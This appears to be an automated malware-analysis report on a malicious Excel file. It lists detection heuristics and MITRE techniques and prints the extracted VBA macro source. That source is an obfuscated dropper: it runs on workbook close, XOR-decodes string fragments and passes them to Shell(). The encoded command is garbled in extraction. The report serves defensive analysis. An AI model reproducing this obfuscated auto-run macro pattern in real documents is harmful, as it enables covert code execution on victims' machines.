Verdict: MALICIOUS (Risk Score: 140)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The critical heuristic OLE_VBA_SHELL indicates that the VBA macros in this Excel file attempt to execute a command: the script builds the string 'calc' and passes it to the Shell() function, likely to download and run a second-stage payload. The ClamAV signature (Xls.Dropper.Agent-7401228-0) further confirms its malicious nature as a dropper.
Heuristics (3)

- critical: CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Dropper.Agent-7401228-0
- medium: OLE_VBA_MACROS: Document contains VBA macro code (1 related finding)
- critical: OLE_VBA_SHELL: Shell() call in VBA
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2054 bytes | ba189e7eb90f83d0ef92e2383580b33322a3d8c72f9e3d0ac283a539e2fe77b7 |
Preview script (first 1,000 lines of the extracted script; non-printable bytes inside the XOR-encoded string literals were lost during extraction and are shown as spaces):

```vba
Attribute VB_Name = "Module1"
Sub maybe()
heart
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
maybe
Var = "calc"
Shell (Var)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Sub heart()
LL1 = fMf5j80uf(" B v ;F PX x", "qjw6eVxO2")
LL2 = fMf5j80uf("; c", "VeLqiZ8wF")
LL3 = fMf5j80uf(" $ ", "iWnqclUVA")
LL4 = fMf5j80uf(" >#U1 6 %?U, ", "rvDZ9DkWo")
LL5 = fMf5j80uf("& Y ! >", "Kz6eOwMRf")
LL = LL1 + LL2 + LL3 + LL4 + LL5
Shell (LL)
End Sub
Public Function YDyzxCnuBRs()
Dim sRuZQEtNEvISCBp As Integer
sRuZQEtNEvISCBp = "4470"
End Function
Public Function lNhMkCOCAuMJgPbgdoFG()
Dim sRuZQEtNEvISCBp As Integer
sRuZQEtNEvISCBp = "4470"
Dim rUkQQqyoTOPNSDwDi As Long
rUkQQqyoTOPNSDwDi = "8898"
End Function
Public Function fMf5j80uf(ByVal tYKgX4jdl As String, ByVal I50RspIZC As String) As String
Dim a2xCMwg4M As Long
For a2xCMwg4M = 1 To Len(tYKgX4jdl)
fMf5j80uf = fMf5j80uf & Chr(Asc(Mid(I50RspIZC, IIf(a2xCMwg4M Mod Len(I50RspIZC) <> 0, a2xCMwg4M Mod Len(I50RspIZC), Len(I50RspIZC)), 1)) Xor Asc(Mid(tYKgX4jdl, a2xCMwg4M, 1)))
Next a2xCMwg4M
End Function
Private Function phGjNytiCtkx()
Dim PrNaoVnZdD As Integer
PrNaoVnZdD = "7985"
End Function
Private Function ByUrPURdgvQblgJZsLfaOuDECHslsQ()
Dim PrNaoVnZdD As Integer
PrNaoVnZdD = "7985"
If "FxQmeOwySvAOZtGu" = "HedEmDquTuFROlHgYTgwLhUeBw" Then End
End Function
```